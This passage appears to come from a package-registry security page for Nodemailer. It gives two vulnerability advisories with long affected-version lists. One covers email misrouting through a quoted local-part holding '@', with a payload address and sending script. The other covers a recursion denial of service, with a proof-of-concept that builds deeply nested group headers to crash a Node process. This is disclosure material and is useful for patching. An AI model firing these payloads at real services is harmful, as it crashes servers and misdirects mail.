"1.0.0", "1.0.0-rc.1", "0.7.1", "0.7.0", "0.6.5", "0.6.4", "0.6.3", "0.6.2", "0.6.1", "0.6.0", "0.5.15", "0.5.14", "0.5.13", "0.5.12", "0.5.11", "0.5.10", "0.5.9", "0.5.8", "0.5.7", "0.5.6", "0.5.5", "0.5.4", "0.5.3", "0.5.2", "0.5.1", "0.5.0", "0.4.4", "0.4.3", "0.4.2", "0.4.1", "0.4.0", "0.3.44", "0.3.43", "0.3.42", "0.3.41", "0.3.40", "0.3.39", "0.3.38", "0.3.37", "0.3.35", "0.3.34", "0.3.33", "0.3.32", "0.3.31", "0.3.30", "0.3.29", "0.3.28", "0.3.27", "0.3.26", "0.3.25", "0.3.24", "0.3.23", "0.3.22", "0.3.21", "0.3.20", "0.3.19", "0.3.18", "0.3.17", "0.3.16", "0.3.15", "0.3.14", "0.3.13", "0.3.12", "0.3.11", "0.3.10", "0.3.9", "0.3.8", "0.3.7", "0.3.6", "0.3.5", "0.3.4", "0.3.3", "0.3.2", "0.3.1", "0.3.0", "0.2.4", "0.2.3", "0.2.2", "0.2.1", "0.2.0", "0.1.24", "0.1.23", "0.1.22", "0.1.21", "0.1.20", "0.1.19", "0.1.18", "0.1.17", "0.1.16", "0.1.15", "0.1.14", "0.1.13", "0.1.12", "0.1.11", "0.1.10", "0.1.9", "0.1.8", "0.1.7", "0.1.6", "0.1.5", "0.1.4", "0.1.3", "0.1.2", "0.1.1"]
Secure versions: [8.0.4]
Recommendation: Update to version 8.0.4.

Nodemailer: Email to an unintended domain can occur due to Interpretation Conflict

Published date: 2025-10-07T13:42:02Z
CVE: CVE-2025-13033
Links:

The email parsing library incorrectly handles quoted local-parts containing @. This leads to misrouting of email recipients, where the parser extracts and routes to an unintended domain instead of the RFC-compliant target.

Payload: "xclow3n@gmail.com x"@internal.domain Using the following code to send mail ``` const nodemailer = require(nodemailer);

let transporter = nodemailer.createTransport({ service: gmail, auth: { user: , pass:, }, });

let mailOptions = { from: 'Test Sender ', to: \xclow3n@gmail.com x\@internal.domain, subject: Hello from Nodemailer, text: This is a test email sent using Gmail SMTP and Nodemailer!, };

transporter.sendMail(mailOptions, (error, info) => { if (error) { return console.log(Error:, error); } console.log(Message sent: %s, info.messageId);

});

(async () => { const parser = await import(@sparser/email-address-parser); const { EmailAddress, ParsingOptions } = parser.default; const parsed = EmailAddress.parse(mailOptions.to /*, new ParsingOptions(true) */);

if (!parsed) { console.error(Invalid email address:, mailOptions.to); return; }

console.log(Parsed email:, { address: ${parsed.localPart}@${parsed.domain}, local: parsed.localPart, domain: parsed.domain, }); })(); ```

Running the script and seeing how this mail is parsed according to RFC

Parsed email: {
  address: '"xclow3n@gmail.com x"@internal.domain',
  local: '"xclow3n@gmail.com x"',
  domain: 'internal.domain'
}

But the email is sent to xclow3n@gmail.com

Image

Impact:

  • Misdelivery / Data leakage: Email is sent to psres.net instead of test.com.

  • Filter evasion: Logs and anti-spam systems may be bypassed by hiding recipients inside quoted local-parts.

  • Potential compliance issue: Violates RFC 5321/5322 parsing rules.

  • Domain based access control bypass in downstream applications using your library to send mails

Recommendations

  • Fix parser to correctly treat quoted local-parts per RFC 5321/5322.

  • Add strict validation rejecting local-parts containing embedded @ unless fully compliant with quoting.

Affected versions: ["7.0.6", "7.0.5", "7.0.4", "7.0.3", "7.0.2", "7.0.1", "7.0.0", "6.10.1", "6.10.0", "6.9.16", "6.9.15", "6.9.14", "6.9.13", "6.9.12", "6.9.11", "6.9.10", "6.9.9", "6.9.8", "6.9.7", "6.9.6", "6.9.5", "6.9.4", "6.9.3", "6.9.2", "6.9.1", "6.9.0", "6.8.0", "6.7.8", "6.7.7", "6.7.6", "6.7.5", "6.7.4", "6.7.3", "6.7.2", "6.7.1", "6.7.0", "6.6.5", "6.6.4", "6.6.3", "6.6.2", "6.6.1", "6.6.0", "6.5.0", "6.4.18", "6.4.17", "6.4.16", "6.4.15", "6.4.14", "6.4.13", "6.4.12", "6.4.11", "6.4.10", "6.4.8", "6.4.7", "6.4.6", "6.4.5", "6.4.4", "6.4.3", "6.4.2", "6.4.1", "6.4.0", "6.3.1", "6.3.0", "6.2.1", "6.1.1", "6.1.0", "6.0.0", "5.1.1", "5.1.0", "5.0.1", "5.0.0", "4.7.0", "4.6.8", "4.6.7", "4.6.6", "4.6.5", "4.6.4", "4.6.3", "4.6.2", "4.6.1", "4.6.0", "4.5.0", "4.4.2", "4.4.1", "4.4.0", "4.3.1", "4.3.0", "4.2.0", "4.1.3", "4.1.2", "4.1.1", "4.1.0", "4.0.1", "4.0.0", "3.1.8", "3.1.7", "3.1.6", "3.1.5", "3.1.4", "3.1.3", "3.1.2", "3.1.1", "3.1.0", "3.0.2", "3.0.1", "3.0.0", "2.7.2", "2.7.1", "2.7.0", "2.6.4", "2.6.3", "2.6.2", "2.6.1", "2.6.0", "2.5.0", "2.4.2", "2.4.1", "2.4.0", "2.4.0-beta.0", "2.3.2", "2.3.1", "2.3.1-rc.0", "2.3.0", "2.3.0-rc.3", "2.3.0-rc.2", "2.3.0-beta.1", "2.3.0-beta.0", "2.2.1", "2.2.0", "2.2.0-rc.11", "2.2.0-rc.10", "2.2.0-rc.9", "2.2.0-rc.8", "2.2.0-rc.7", "2.2.0-beta.6", "2.2.0-beta.5", "2.2.0-beta.4", "2.2.0-beta.3", "2.2.0-beta.2", "2.2.0-beta.1", "2.2.0-beta.0", "2.1.0", "2.1.0-rc.1", "2.1.0-rc.0", "2.1.0-beta.3", "2.1.0-beta.2", "2.1.0-beta.1", "2.1.0-beta.0", "2.0.0", "2.0.0-rc.2", "2.0.0-rc.1", "2.0.0-beta.2", "2.0.0-beta.1", "2.0.0-beta.0", "1.11.0", "1.10.0", "1.9.0", "1.8.0", "1.7.0", "1.6.0", "1.5.0", "1.4.0", "1.3.4", "1.3.3", "1.3.2", "1.3.1", "1.3.0", "1.2.2", "1.2.1", "1.2.0", "1.1.2", "1.1.1", "1.1.0", "1.0.4", "1.0.3", "1.0.2", "1.0.1", "1.0.0", "1.0.0-rc.1", "0.7.1", "0.7.0", "0.6.5", "0.6.4", "0.6.3", "0.6.2", "0.6.1", "0.6.0", "0.5.15", "0.5.14", "0.5.13", "0.5.12", "0.5.11", "0.5.10", "0.5.9", "0.5.8", "0.5.7", "0.5.6", "0.5.5", "0.5.4", "0.5.3", "0.5.2", "0.5.1", "0.5.0", "0.4.4", "0.4.3", "0.4.2", "0.4.1", "0.4.0", "0.3.44", "0.3.43", "0.3.42", "0.3.41", "0.3.40", "0.3.39", "0.3.38", "0.3.37", "0.3.35", "0.3.34", "0.3.33", "0.3.32", "0.3.31", "0.3.30", "0.3.29", "0.3.28", "0.3.27", "0.3.26", "0.3.25", "0.3.24", "0.3.23", "0.3.22", "0.3.21", "0.3.20", "0.3.19", "0.3.18", "0.3.17", "0.3.16", "0.3.15", "0.3.14", "0.3.13", "0.3.12", "0.3.11", "0.3.10", "0.3.9", "0.3.8", "0.3.7", "0.3.6", "0.3.5", "0.3.4", "0.3.3", "0.3.2", "0.3.1", "0.3.0", "0.2.4", "0.2.3", "0.2.2", "0.2.1", "0.2.0", "0.1.24", "0.1.23", "0.1.22", "0.1.21", "0.1.20", "0.1.19", "0.1.18", "0.1.17", "0.1.16", "0.1.15", "0.1.14", "0.1.13", "0.1.12", "0.1.11", "0.1.10", "0.1.9", "0.1.8", "0.1.7", "0.1.6", "0.1.5", "0.1.4", "0.1.3", "0.1.2", "0.1.1"]
Secure versions: [8.0.4]
Recommendation: Update to version 8.0.4.

Nodemailer’s addressparser is vulnerable to DoS caused by recursive calls

Published date: 2025-12-01T20:44:25Z
CVE: CVE-2025-14874
Links:

Summary

A DoS can occur that immediately halts the system due to the use of an unsafe function.

Details

According to RFC 5322, nested group structures (a group inside another group) are not allowed. Therefore, in lib/addressparser/index.js, the email address parser performs flattening when nested groups appear, since such input is likely to be abnormal. (If the address is valid, it is added as-is.) In other words, the parser flattens all nested groups and inserts them into the final group list. However, the code implemented for this flattening process can be exploited by malicious input and triggers DoS

RFC 5322 uses a colon (:) to define a group, and commas (,) are used to separate members within a group. At the following location in lib/addressparser/index.js:

https://github.com/nodemailer/nodemailer/blob/master/lib/addressparser/index.js#L90

there is code that performs this flattening. The issue occurs when the email address parser attempts to process the following kind of malicious address header:

g0: g1: g2: g3: ... gN: victim@example.com;

Because no recursion depth limit is enforced, the parser repeatedly invokes itself in the pattern addressparser → _handleAddress → addressparser → ... for each nested group. As a result, when an attacker sends a header containing many colons, Nodemailer enters infinite recursion, eventually throwing Maximum call stack size exceeded and causing the process to terminate immediately. Due to the structure of this behavior, no authentication is required, and a single request is enough to shut down the service.

The problematic code section is as follows: js if (isGroup) { ... if (data.group.length) { let parsedGroup = addressparser(data.group.join(',')); // <- boom! parsedGroup.forEach(member => { if (member.group) { groupMembers = groupMembers.concat(member.group); } else { groupMembers.push(member); } }); } } data.group is expected to contain members separated by commas, but in the attacker’s payload the group contains colon (:) tokens. Because of this, the parser repeatedly triggers recursive calls for each colon, proportional to their number.

PoC

const nodemailer = require('nodemailer');

function buildDeepGroup(depth) {
  let parts = [];
  for (let i = 0; i < depth; i++) {
    parts.push(`g${i}:`);
  }
  return parts.join(' ') + ' user@example.com;';
}

const DEPTH = 3000; // <- control depth 
const toHeader = buildDeepGroup(DEPTH);
console.log('to header length:', toHeader.length);

const transporter = nodemailer.createTransport({
  streamTransport: true,
  buffer: true,
  newline: 'unix'
});

console.log('parsing start');

transporter.sendMail(
  {
    from: 'test@example.com',
    to: toHeader,
    subject: 'test',
    text: 'test'
  },
  (err, info) => {
    if (err) {
      console.error('error:', err);
    } else {
      console.log('finished :', info && info.envelope);
    }
  }
);

As a result, when the colon is repeated beyond a certain threshold, the Node.js process terminates immediately.

Impact

The attacker can achieve the following:

  1. Force an immediate crash of any server/service that uses Nodemailer
  2. Kill the backend process with a single web request
  3. In environments using PM2/Forever, trigger a continuous restart loop, causing severe resource exhaustion”

Affected versions: ["7.0.10", "7.0.9", "7.0.7", "7.0.6", "7.0.5", "7.0.4", "7.0.3", "7.0.2", "7.0.1", "7.0.0", "6.10.1", "6.10.0", "6.9.16", "6.9.15", "6.9.14", "6.9.13", "6.9.12", "6.9.11", "6.9.10", "6.9.9", "6.9.8", "6.9.7", "6.9.6", "6.9.5", "6.9.4", "6.9.3", "6.9.2", "6.9.1", "6.9.0", "6.8.0", "6.7.8", "6.7.7", "6.7.6", "6.7.5", "6.7.4", "6.7.3", "6.7.2", "6.7.1", "6.7.0", "6.6.5", "6.6.4", "6.6.3", "6.6.2", "6.6.1", "6.6.0", "6.5.0", "6.4.18", "6.4.17", "6.4.16", "6.4.15", "6.4.14", "6.4.13", "6.4.12", "6.4.11", "6.4.10", "6.4.8", "6.4.7", "6.4.6", "6.4.5", "6.4.4", "6.4.3", "6.4.2", "6.4.1", "6.4.0", "6.3.1", "6.3.0", "6.2.1", "6.1.1", "6.1.0", "6.0.0", "5.1.1", "5.1.0", "5.0.1", "5.0.0", "4.7.0", "4.6.8", "4.6.7", "4.6.6", "4.6.5", "4.6.4", "4.6.3", "4.6.2", "4.6.1", "4.6.0", "4.5.0", "4.4.2", "4.4.1", "4.4.0", "4.3.1", "4.3.0", "4.2.0", "4.1.3", "4.1.2", "4.1.1", "4.1.0", "4.0.1", "4.0.0", "3.1.8", "3.1.7", "3.1.6", "3.1.5", "3.1.4", "3.1.3", "3.1.2", "3.1.1", "3.1.0", "3.0.2", "3.0.1", "3.0.0", "2.7.2", "2.7.1", "2.7.0", "2.6.4", "2.6.3", "2.6.2", "2.6.1", "2.6.0", "2.5.0", "2.4.2", "2.4.1", "2.4.0", "2.4.0-beta.0", "2.3.2", "2.3.1", "2.3.1-rc.0", "2.3.0", "2.3.0-rc.3", "2.3.0-rc.2", "2.3.0-beta.1", "2.3.0-beta.0", "2.2.1", "2.2.0", "2.2.0-rc.11", "2.2.0-rc.10", "2.2.0-rc.9", "2.2.0-rc.8", "2.2.0-rc.7", "2.2.0-beta.6", "2.2.0-beta.5", "2.2.0-beta.4", "2.2.0-beta.3", "2.2.0-beta.2", "2.2.0-beta.1", "2.2.0-beta.0", "2.1.0", "2.1.0-rc.1", "2.1.0-rc.0", "2.1.0-beta.3", "2.1.0-beta.2", "2.1.0-beta.1", "2.1.0-beta.0", "2.0.0", "2.0.0-rc.2", "2.0.0-rc.1", "2.0.0-beta.2", "2.0.0-beta.1", "2.0.0-beta.0", "1.11.0", "1.10.0", "1.9.0", "1.8.0", "1.7.0", "1.6.0", "1.5.0", "1.4.0", "1.3.4", "1.3.3", "1.3.2", "1.3.1", "1.3.0", "1.2.2", "1.2.1", "1.2.0", "1.1.2", "1.1.1", "1.1.0", "1.0.4", "1.0.3", "1.0.2", "1.0.1", "1.0.0", "1.0.0-rc.1", "0.7.1", "0.7.0", "0.6.5", "0.6.4", "0.6.3", "0.6.2", "0.6.1", "0.6.0", "0.5.15", "0.5.14", "0.5.13", "0.5.12", "0.5.11", "0.5.10", "0.5.9", "0.5.8", "0.5.7", "0.5.6", "0.5.5", "0.5.4", "0.5.3", "0.5.2", "0.5.1", "0.5.0", "0.4.4", "0.4.3", "0.4.2", "0.4.1", "0.4.0", "0.3.44", "0.3.43", "0.3.42", "0.3.41", "0.3.40", "0.3.39", "0.3.38", "0.3.37", "0.3.35", "0.3.34", "0.3.33", "0.3.32", "0.3.31", "0.3.30", "0.3.29", "0.3.28", "0.3.27", "0.3.26", "0.3.25", "0.3.24", "0.3.23", "0.3.22", "0.3.21", "0.3.20", "0.3.19", "0.3.18", "0.3.17", "0.3.16", "0.3.15", "0.3.14", "0.3.13", "0.3.12", "0.3.11", "0.3.10", "0.3.9", "0.3.8", "0.3.7", "0.3.6", "0.3.5", "0.3.4", "0.3.3", "0.3.2", "0.3.1", "0.3.0", "0.2.4", "0.2.3", "0.2.2", "0.2.1", "0.2.0", "0.1.24", "0.1.23", "0.1.22", "0.1.21", "0.1.20", "0.1.19", "0.1.18", "0.1.17", "0.1.16", "0.1.15", "0.1.14", "0.1.13", "0.1.12", "0.1.11", "0.1.10", "0.1.9", "0.1.8", "0.1.7", "0.1.6", "0.1.5", "0.1.4", "0.1.3", "0.1.2", "0.1.1"]
Secure versions: [8.0.4]
Recommendation: Update to version 8.0.4.

292 Other Versions

Version License Security Released
0.5.13 MIT 8 2013-12-03 - 09:39 over 12 years
0.5.12 MIT 8 2013-12-01 - 22:20 over 12 years
0.5.11 MIT 8 2013-11-28 - 06:25 over 12 years
0.5.10 MIT 8 2013-11-26 - 12:19 over 12 years
0.5.9 MIT 8 2013-11-25 - 12:40 over 12 years
0.5.8 MIT 8 2013-11-22 - 14:20 over 12 years
0.5.7 MIT 8 2013-11-18 - 11:50 over 12 years
0.5.6 MIT 8 2013-11-15 - 13:21 over 12 years
0.5.5 MIT 8 2013-10-30 - 09:25 over 12 years
0.5.4 MIT 8 2013-10-29 - 11:48 over 12 years
0.5.3 MIT 8 2013-10-03 - 07:43 over 12 years
0.5.2 MIT 8 2013-07-25 - 20:06 over 12 years
0.5.1 MIT 8 2013-07-25 - 07:15 over 12 years
0.5.0 MIT 8 2013-07-05 - 08:51 over 12 years
0.4.4 MIT 8 2013-05-22 - 10:32 almost 13 years
0.4.3 MIT 8 2013-05-20 - 11:44 almost 13 years
0.4.2 MIT 8 2013-05-15 - 13:40 almost 13 years
0.4.1 MIT 8 2013-03-23 - 20:12 about 13 years
0.4.0 MIT 8 2013-03-23 - 07:12 about 13 years
0.3.44 MIT 8 2013-03-10 - 17:18 about 13 years
0.3.43 MIT 8 2013-02-28 - 13:52 about 13 years
0.3.42 MIT 8 2013-02-08 - 13:01 about 13 years
0.3.41 MIT 8 2013-02-04 - 08:40 about 13 years
0.3.40 MIT 8 2013-02-01 - 22:01 about 13 years
0.3.39 MIT 8 2013-02-01 - 10:42 about 13 years
0.3.38 MIT 8 2013-02-01 - 10:40 about 13 years
0.3.37 MIT 8 2012-12-17 - 13:01 over 13 years
0.3.35 MIT 8 2012-11-30 - 11:59 over 13 years
0.3.34 MIT 8 2012-11-28 - 09:50 over 13 years
0.3.33 MIT 8 2012-11-27 - 12:46 over 13 years
0.3.32 MIT 8 2012-11-24 - 21:43 over 13 years
0.3.31 MIT 8 2012-11-06 - 08:10 over 13 years
0.3.30 MIT 8 2012-11-02 - 20:12 over 13 years
0.3.29 MIT 8 2012-10-29 - 09:20 over 13 years
0.3.28 MIT 8 2012-09-13 - 07:03 over 13 years
0.3.27 MIT 8 2012-09-10 - 10:32 over 13 years
0.3.26 MIT 8 2012-09-07 - 06:51 over 13 years
0.3.25 MIT 8 2012-09-04 - 16:09 over 13 years
0.3.24 MIT 8 2012-09-04 - 12:19 over 13 years
0.3.23 MIT 8 2012-09-04 - 12:11 over 13 years
0.3.22 MIT 8 2012-08-07 - 13:37 over 13 years
0.3.21 MIT 8 2012-07-17 - 10:51 over 13 years
0.3.20 MIT 8 2012-05-09 - 07:58 almost 14 years
0.3.19 MIT 8 2012-05-02 - 20:18 almost 14 years
0.3.18 MIT 8 2012-04-16 - 11:34 almost 14 years
0.3.17 MIT 8 2012-04-15 - 04:46 almost 14 years
0.3.16 MIT 8 2012-04-14 - 20:10 almost 14 years
0.3.15 MIT 8 2012-04-14 - 19:31 almost 14 years
0.3.14 MIT 8 2012-04-03 - 09:20 about 14 years
0.3.13 MIT 8 2012-04-03 - 08:18 about 14 years